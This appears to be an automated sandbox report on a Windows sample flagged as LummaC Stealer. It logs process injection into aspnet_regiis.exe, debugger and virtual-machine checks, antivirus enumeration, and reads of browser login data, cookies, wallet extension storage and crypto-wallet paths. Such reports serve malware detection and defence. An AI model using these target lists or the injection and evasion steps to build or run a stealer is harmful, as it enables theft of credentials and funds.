Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: aspnet_regiis.exe, 00000003.00000003.2164558662.00000000051DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_6E0C182A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E0C182A

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C2FB5 mov eax, dword ptr fs:[00000030h]		0_2_6E0C2FB5
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C4189 mov eax, dword ptr fs:[00000030h]		0_2_6E0C4189

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_6E0C5D9C GetProcessHeap,

0_2_6E0C5D9C

Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C1351 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E0C1351
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C182A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E0C182A
Source: C:\Users\user\Desktop\Script.exe	Code function: 0_2_6E0C41BA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E0C41BA

Source: C:\Users\user\Desktop\Script.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Script.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Script.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E0000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E1000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A22000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A25000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A35000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A36000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 29E1000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A22000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A25000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A35000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2A36000	Jump to behavior
Source: C:\Users\user\Desktop\Script.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 717008	Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_6E0C19F8 cpuid

0_2_6E0C19F8

Source: C:\Users\user\Desktop\Script.exe	Queries volume information: C:\Users\user\Desktop\Script.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Script.exe

Code function: 0_2_6E0C1473 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E0C1473

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: aspnet_regiis.exe, 00000003.00000003.2278969823.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2524957712.0000000002E93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s%\Windows Defender\MsMpeng.exe
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2524755944.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2523525907.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2235306100.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 768, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: aspnet_regiis.exe	String found in binary or memory: Wallets/Electrum
Source: aspnet_regiis.exe	String found in binary or memory: Wallets/ElectronCash
Source: aspnet_regiis.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: aspnet_regiis.exe	String found in binary or memory: window-state.json
Source: aspnet_regiis.exe	String found in binary or memory: Wallets/Exodus
Source: aspnet_regiis.exe	String found in binary or memory: %appdata%\Ethereum
Source: aspnet_regiis.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: aspnet_regiis.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
